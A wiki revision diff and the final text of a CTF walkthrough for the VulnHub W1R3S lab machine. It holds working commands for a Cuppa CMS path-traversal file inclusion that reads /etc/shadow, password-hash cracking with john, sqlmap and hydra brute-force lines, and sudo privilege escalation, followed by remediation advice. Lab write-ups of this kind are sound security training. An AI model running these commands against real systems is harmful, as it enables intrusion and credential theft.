Difference between revisions of "W1R3S: 1.0.1 ~ VulnHub - CTF Walkthrough"

(Created page with "== Objective == xxxxxxxxxxxxxxxxxxxxx Source: https://www.vulnhub.com/xxxx xxxxxx Status: [<span style="color:green">Completed</span>] == Methodology == === Discovery...")
 
m (Final Notes)
 
(9 intermediate revisions by the same user not shown)
Line 1: Line 1:
 
== Objective ==
 
== Objective ==
xxxxxxxxxxxxxxxxxxxxx
+
You have been hired to do a penetration test on the W1R3S.inc individual server and report all findings. They have asked you to gain root access and find the flag (located in /root directory).
  
Source: [[https://www.vulnhub.com/xxxx xxxxxx]]
+
Source: [ [https://www.vulnhub.com/entry/w1r3s-101,220/ VulnHub.com] ]
  
Status: [<span style="color:green">Completed</span>]
+
Status: [ <span style="color:green">Completed</span> ]
  
 
== Methodology ==  
 
== Methodology ==  
Line 12: Line 12:
 
</syntaxhighlight>
 
</syntaxhighlight>
 
<syntaxhighlight  lang=shell-session highlight="" line>
 
<syntaxhighlight  lang=shell-session highlight="" line>
root@kali:~/Desktop/w1r3s# nmap -O -sT -sV -p- -T5 192.168.56.101
+
root@blaksec:~/Desktop/w1r3s# nmap -O -sT -sV -p- -T5 $TANGO
  
 
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-26 19:01 EDT
 
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-26 19:01 EDT
Line 33: Line 33:
 
</syntaxhighlight>
 
</syntaxhighlight>
  
=== Entry Point #1 - Port NN (XXX) ===
+
=== Entry Point #1 - Port 80 (HTTP) ===
 
==== Enumeration ====
 
==== Enumeration ====
 +
A quick scan with '''dirb''' came back with two directories '''wordpress''' and '''administrator'''. The former runs the obvious - '''Word Press''', the latter - '''CUPPA CMS'''
 +
 +
'''WordPress''' is configured to run under '''localhost''' so we need to update /etc/hosts
 
<syntaxhighlight  lang=shell-session highlight="" line>
 
<syntaxhighlight  lang=shell-session highlight="" line>
xxxxx
+
192.168.56.101 localhost
 
</syntaxhighlight>
 
</syntaxhighlight>
  
 +
A quick checked  of '''WordPress''' with '''wp-scan''' did not reveal anything interesting. Gut feel tells me to put that aside and move to '''CUPPA''' older versions of which, according to google, come with a '''LFI''' vulnerability.
  
 +
=== Exploitation ===
 
<syntaxhighlight  lang=shell-session highlight="4" line>
 
<syntaxhighlight  lang=shell-session highlight="4" line>
xxxxx
+
root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://localhost/administrator/alerts/alertConfigField.php |grep sbin
 +
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 +
bin:x:2:2:bin:/bin:/usr/sbin/nologin
 +
sys:x:3:3:sys:/dev:/usr/sbin/nologin
 +
......
 +
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 +
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
 +
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
 +
</syntaxhighlight>
 +
And taking it a step further...
 +
<syntaxhighlight  lang=shell-session highlight="3,5,7" line>
 +
root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://localhost/administrator/alerts/alertConfigField.php
 +
...
 +
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
 +
...
 +
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
 +
...
 +
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:999...
 
</syntaxhighlight>
 
</syntaxhighlight>
  
=== Exploitation ===
+
Didn't take long to crack the hashes with good old trusty '''john'''
xxx
+
 
xxx
+
 
xxx
 
  
 
<syntaxhighlight  lang=shell-session highlight="4,5,6,7" line>
 
<syntaxhighlight  lang=shell-session highlight="4,5,6,7" line>
xxx
+
root@blaksec:~/Desktop/w1r3s# john --show shadow.txt
xxx
+
w1r3s:computer
 +
www-data:www-data
 +
 
 +
2 password hashes cracked, 1 left
 +
 
 +
</syntaxhighlight>
 +
 
 +
<syntaxhighlight  lang=shell-session highlight="23" line>
 +
root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# ssh w1r3s@$TANGO
 +
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
 +
ECDSA key fingerprint is SHA256:/3N0PzPMqtXlj9QWJFMbCufh2W95JylZ/oF82NkAAto.
 +
Are you sure you want to continue connecting (yes/no)? yes
 +
Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts.
 +
----------------------
 +
Think this is the way?
 +
----------------------
 +
Well,........possibly.
 +
----------------------
 +
w1r3s@192.168.56.101's password:
 +
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)
 +
 
 +
* Documentation:  https://help.ubuntu.com
 +
* Management:    https://landscape.canonical.com
 +
* Support:        https://ubuntu.com/advantage
 +
 
 +
108 packages can be updated.
 +
6 updates are security updates.
 +
 
 +
.....You made it huh?....
 +
Last login: Sun Apr  1 14:38:25 2018 from 192.168.56.200
 +
w1r3s@W1R3S:~$
 +
</syntaxhighlight>
 +
 
 +
 
 +
<syntaxhighlight  lang=shell-session highlight="8" line>
 +
w1r3s@W1R3S:~$ sudo -l
 +
sudo: unable to resolve host W1R3S: Connection refused
 +
[sudo] password for w1r3s:
 +
Matching Defaults entries for w1r3s on W1R3S:
 +
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 +
 
 +
User w1r3s may run the following commands on W1R3S:
 +
    (ALL : ALL) ALL
 +
</syntaxhighlight>
 +
 
 +
<syntaxhighlight  lang=shell-session highlight="5" line>
 +
w1r3s@W1R3S:~$ sudo /bin/bash
 +
sudo: unable to resolve host W1R3S: Connection refused
 +
root@W1R3S:~# cd /root
 +
root@W1R3S:/root# ls
 +
flag.txt
 +
root@W1R3S:/root# cat flag.txt
 +
-----------------------------------------------------------------------------------------
 +
  ____ ___  _  _  ____ ____      _  _____ _  _ _        _  _____ ___ ___  _  _ ____ 
 +
  / ___/ _ \| \ | |/ ___|  _ \    / \|_  _| | | | |      / \|_  _|_ _/ _ \| \ | / ___|
 +
| |  | | | |  \| | |  _| |_) |  / _ \ | | | | | | |    / _ \ | |  | | | | |  \| \___ \
 +
| |__| |_| | |\  | |_| |  _ <  / ___ \| | | |_| | |___ / ___ \| |  | | |_| | |\  |___) |
 +
  \____\___/|_| \_|\____|_| \_\/_/  \_\_|  \___/|_____/_/  \_\_| |___\___/|_| \_|____/
 +
                                                                                       
 +
-----------------------------------------------------------------------------------------
 +
 
 +
                          .-----------------TTTT_-----_______
 +
                        /''''''''''(______O] ----------____  \______/]_
 +
    __...---'"""\_ --''  Q                              ___________@
 +
|'''                  ._  _______________=---------"""""""
 +
|                ..--''|  l L |_l  |
 +
|          ..--''      .  /-___j '  '
 +
|    ..--''          /  ,      '  '
 +
|--''                /          `    \
 +
                      L__'        \    -
 +
                                    -    '-.
 +
                                    '.    /
 +
                                      '-./
 +
 
 +
----------------------------------------------------------------------------------------
 +
  YOU HAVE COMPLETED THE
 +
              __      __  ______________________  _________
 +
              /  \    /  \/_  \______  \_____  \ /  _____/
 +
              \  \/\/  / |  ||      _/ _(__  < \_____  \
 +
              \        /  |  ||    |  \/      \/        \
 +
                \__/\  /  |___||____|_  /______  /_______  /.INC
 +
                    \/                \/      \/        \/        CHALLENGE, V 1.0
 +
----------------------------------------------------------------------------------------
 +
 
 +
CREATED BY SpecterWires
 +
 
 +
------------------------------------------------------------------------------
 +
</syntaxhighlight>
 +
 
 +
== Final Notes ==
 +
Lots of decoys! Some things I tried which did not work but might come handy one day:
 +
 
 +
Using '''nmap''' wordpress scripts
 +
<syntaxhighlight  lang=shell-session highlight="" line>
 +
root@kali:~/Desktop/Bob:1# nmap -sV --script http-wordpress-enum -p 80 --script http-wordpress-users --script-args 'limit=5000,basepath=/wordpress/' 192.168.56.101
 +
PORT  STATE SERVICE VERSION
 +
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
 +
|_http-server-header: Apache/2.4.18 (Ubuntu)
 +
| http-wordpress-users:
 +
| Username found: joseph-g
 +
|_Search stopped at ID #5000. Increase the upper limit if necessary with 'http-wordpress-users.limit'
 +
MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC)
 +
 
 +
root@kali:~/Desktop/Bob:1# nmap -sV --script http-wordpress-enum -p 80 --script-args 'http-wordpress-enum.root=/wordpress,http-wordpress-enum.search-limit=all' 192.168.56.101
 +
Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-02 08:32 EDT
 +
Nmap scan report for localhost (192.168.56.101)
 +
Host is up (0.00024s latency).
 +
 
 +
PORT  STATE SERVICE VERSION
 +
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
 +
|_http-server-header: Apache/2.4.18 (Ubuntu)
 +
| http-wordpress-enum:
 +
| Search limited to top 50546 themes/plugins
 +
|  themes
 +
|    twentyfifteen 1.9
 +
|    twentysixteen 1.4
 +
|    twentyseventeen 1.4nmap -O -sT -sV -p- -T5 192.168.56.101
 +
|  plugins
 +
|_    akismet 4.0.2
 +
MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC)
 +
 
 
</syntaxhighlight>
 
</syntaxhighlight>
  
xxx
+
Using '''sqlmap'''
 
<syntaxhighlight  lang=shell-session highlight="" line>
 
<syntaxhighlight  lang=shell-session highlight="" line>
xxx
+
sqlmap -u http://localhost/administrator/installation/ --dbms=mysql --data="host=localhost&db=asdf&user=root&password=asdf&table_prefix=cu_&name=Administrator&email=asdf%40mail.com&username=admin&username_password=admin&view=installation_finished" --dump users --level=5 --risk=3
xxx
 
 
</syntaxhighlight>
 
</syntaxhighlight>
  
 +
Using '''hydra''' to bruteforce WP login
 +
<syntaxhighlight  lang=shell-session highlight="" line>
 +
hydra -u -P /usr/share/wordlists/rockyou.txt -a admin 192.168.56.101 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=incorrect'
 +
</syntaxhighlight>
  
== Final Notes ==
 
xxx
 
 
== Appendix A: Vulnerability Detail and Mitigation ==
 
== Appendix A: Vulnerability Detail and Mitigation ==
 
{| class="wikitable" style="background-color:#cccccc;color:black;font-size:0.9em;width:80%;"
 
{| class="wikitable" style="background-color:#cccccc;color:black;font-size:0.9em;width:80%;"
|+ style="color:#e76700;text-align:left;" | xxx
+
|+ style="color:#e76700;text-align:left;" | Vulnerabilities in un-patched software
 
|-
 
|-
 
|style="width:120px;" |Rating
 
|style="width:120px;" |Rating
Line 71: Line 213:
 
|-
 
|-
 
|Description
 
|Description
|xxxx
+
|An outdated version of Cuppa CMS was found running on the server, exposed and accessible to the outside network. This version is known for it's Local File Inclusion vulnerability.
 +
|-
 +
|Impact
 +
|An attacker can explore the vulnerability to gain access to various files on the local file system, including but not limited to /etc/passwd, /etc/shadow files, which contain user login information and user passwords.
 +
|-
 +
|Remediation
 +
|Update Cuppa CMS software to the latest stable version. Additionally, set up system permissions in the way that critical system files like /etc/passwd are not accessible to the user used to run webserver processes.
 +
|}
 +
 
 +
 
 +
{| class="wikitable" style="background-color:#cccccc;color:black;font-size:0.9em;width:80%;"
 +
|+ style="color:#e76700;text-align:left;" | Weak password policies
 +
|-
 +
|style="width:120px;" |Rating
 +
|style="color:red;" | High
 +
|-
 +
|Description
 +
|Two user accounts are configured with easy-to-guess dictionary-based passwords.
 +
|-
 +
|Impact
 +
|An attacker would be able to easily compromise user accounts using dictionary attacks, which will enable them to log in to the host via ssh.
 +
|-
 +
|Remediation
 +
|Implement stronger password policies enforcing proper password complexity, disallowing dictionary based passwords. Perform periodic audit of the passwords using tools like '''cracklib'''.
 +
|}
 +
 
 +
{| class="wikitable" style="background-color:#cccccc;color:black;font-size:0.9em;width:80%;"
 +
|+ style="color:#e76700;text-align:left;" | All-inclusive sudo role
 +
|-
 +
|style="width:120px;" |Rating
 +
|style="color:yellow;" | Medium
 +
|-
 +
|Description
 +
|Sudo role for user ''w1r3s'' allows for unrestricted access to execute any commands as ''root'' user.
 
|-
 
|-
 
|Impact
 
|Impact
|xxxxxxxxxxxxxxxxxxxxxxxxxxxx
+
|After gaining access to ''w13rs'' account, an attacker will be able to escalate their privileges, gaining access to the ''root'' shell.
 
|-
 
|-
 
|Remediation
 
|Remediation
|xxxxxxxxxxxxxxxxx
+
|Restrict ''sudo'' roles only to specific command. 
 
|}
 
|}

Latest revision as of 21:32, 20 June 2018

Objective

You have been hired to do a penetration test on the W1R3S.inc individual server and report all findings. They have asked you to gain root access and find the flag (located in /root directory).

Source: [ VulnHub.com ]

Status: [ Completed ]

Methodology

Discovery

root@blaksec:/ # export TANGO=192.168.56.101
root@blaksec:~/Desktop/w1r3s# nmap -O -sT -sV -p- -T5 $TANGO

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-26 19:01 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00093s latency).
Not shown: 55528 filtered ports, 10003 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Entry Point #1 - Port 80 (HTTP)

Enumeration

A quick scan with dirb came back with two directories wordpress and administrator. The former runs the obvious - Word Press, the latter - CUPPA CMS

WordPress is configured to run under localhost so we need to update /etc/hosts 

192.168.56.101 localhost

A quick checked of WordPress with wp-scan did not reveal anything interesting. Gut feel tells me to put that aside and move to CUPPA older versions of which, according to google, come with a LFI vulnerability.

Exploitation

root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://localhost/administrator/alerts/alertConfigField.php |grep sbin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
......
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin

And taking it a step further... 

root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://localhost/administrator/alerts/alertConfigField.php
...
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
...
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
...
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:999...

Didn't take long to crack the hashes with good old trusty john 


root@blaksec:~/Desktop/w1r3s# john --show shadow.txt 
w1r3s:computer
www-data:www-data

2 password hashes cracked, 1 left
root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# ssh w1r3s@$TANGO
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:/3N0PzPMqtXlj9QWJFMbCufh2W95JylZ/oF82NkAAto.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts.
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
w1r3s@192.168.56.101's password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

108 packages can be updated.
6 updates are security updates.

.....You made it huh?....
Last login: Sun Apr  1 14:38:25 2018 from 192.168.56.200
w1r3s@W1R3S:~$


w1r3s@W1R3S:~$ sudo -l
sudo: unable to resolve host W1R3S: Connection refused
[sudo] password for w1r3s: 
Matching Defaults entries for w1r3s on W1R3S:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User w1r3s may run the following commands on W1R3S:
    (ALL : ALL) ALL
w1r3s@W1R3S:~$ sudo /bin/bash
sudo: unable to resolve host W1R3S: Connection refused
root@W1R3S:~# cd /root
root@W1R3S:/root# ls
flag.txt
root@W1R3S:/root# cat flag.txt 
-----------------------------------------------------------------------------------------
   ____ ___  _   _  ____ ____      _  _____ _   _ _        _  _____ ___ ___  _   _ ____  
  / ___/ _ \| \ | |/ ___|  _ \    / \|_   _| | | | |      / \|_   _|_ _/ _ \| \ | / ___| 
 | |  | | | |  \| | |  _| |_) |  / _ \ | | | | | | |     / _ \ | |  | | | | |  \| \___ \ 
 | |__| |_| | |\  | |_| |  _ <  / ___ \| | | |_| | |___ / ___ \| |  | | |_| | |\  |___) |
  \____\___/|_| \_|\____|_| \_\/_/   \_\_|  \___/|_____/_/   \_\_| |___\___/|_| \_|____/ 
                                                                                        
-----------------------------------------------------------------------------------------

                          .-----------------TTTT_-----_______
                        /''''''''''(______O] ----------____  \______/]_
     __...---'"""\_ --''   Q                               ___________@
 |'''                   ._   _______________=---------"""""""
 |                ..--''|   l L |_l   |
 |          ..--''      .  /-___j '   '
 |    ..--''           /  ,       '   '
 |--''                /           `    \
                      L__'         \    -
                                    -    '-.
                                     '.    /
                                       '-./

----------------------------------------------------------------------------------------
  YOU HAVE COMPLETED THE
               __      __  ______________________   _________
              /  \    /  \/_   \______   \_____  \ /   _____/
              \   \/\/   / |   ||       _/ _(__  < \_____  \ 
               \        /  |   ||    |   \/       \/        \
                \__/\  /   |___||____|_  /______  /_______  /.INC
                     \/                \/       \/        \/        CHALLENGE, V 1.0
----------------------------------------------------------------------------------------

CREATED BY SpecterWires

------------------------------------------------------------------------------

Final Notes

Lots of decoys! Some things I tried which did not work but might come handy one day:

Using nmap wordpress scripts 

root@kali:~/Desktop/Bob:1# nmap -sV --script http-wordpress-enum -p 80 --script http-wordpress-users --script-args 'limit=5000,basepath=/wordpress/' 192.168.56.101
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-wordpress-users: 
| Username found: joseph-g
|_Search stopped at ID #5000. Increase the upper limit if necessary with 'http-wordpress-users.limit'
MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC)

root@kali:~/Desktop/Bob:1# nmap -sV --script http-wordpress-enum -p 80 --script-args 'http-wordpress-enum.root=/wordpress,http-wordpress-enum.search-limit=all' 192.168.56.101
Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-02 08:32 EDT
Nmap scan report for localhost (192.168.56.101)
Host is up (0.00024s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-wordpress-enum: 
| Search 	limited to top 50546 themes/plugins
|   themes
|     twentyfifteen 1.9
|     twentysixteen 1.4
|     twentyseventeen 1.4nmap -O -sT -sV -p- -T5 192.168.56.101
|   plugins
|_    akismet 4.0.2
MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC)

Using sqlmap 

sqlmap -u http://localhost/administrator/installation/ --dbms=mysql --data="host=localhost&db=asdf&user=root&password=asdf&table_prefix=cu_&name=Administrator&email=asdf%40mail.com&username=admin&username_password=admin&view=installation_finished" --dump users --level=5 --risk=3

Using hydra to bruteforce WP login 

hydra -u -P /usr/share/wordlists/rockyou.txt -a admin 192.168.56.101 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=incorrect'

Appendix A: Vulnerability Detail and Mitigation

Vulnerabilities in un-patched software
Rating High
Description An outdated version of Cuppa CMS was found running on the server, exposed and accessible to the outside network. This version is known for it's Local File Inclusion vulnerability.
Impact An attacker can explore the vulnerability to gain access to various files on the local file system, including but not limited to /etc/passwd, /etc/shadow files, which contain user login information and user passwords.
Remediation Update Cuppa CMS software to the latest stable version. Additionally, set up system permissions in the way that critical system files like /etc/passwd are not accessible to the user used to run webserver processes.


Weak password policies
Rating High
Description Two user accounts are configured with easy-to-guess dictionary-based passwords.
Impact An attacker would be able to easily compromise user accounts using dictionary attacks, which will enable them to log in to the host via ssh.
Remediation Implement stronger password policies enforcing proper password complexity, disallowing dictionary based passwords. Perform periodic audit of the passwords using tools like cracklib.
All-inclusive sudo role
Rating Medium
Description Sudo role for user w1r3s allows for unrestricted access to execute any commands as root user.
Impact After gaining access to w13rs account, an attacker will be able to escalate their privileges, gaining access to the root shell.
Remediation Restrict sudo roles only to specific command.
Retrieved from "https://blaksec.com/index.php?title=W1R3S:_1.0.1_~_VulnHub_-_CTF_Walkthrough&oldid=437"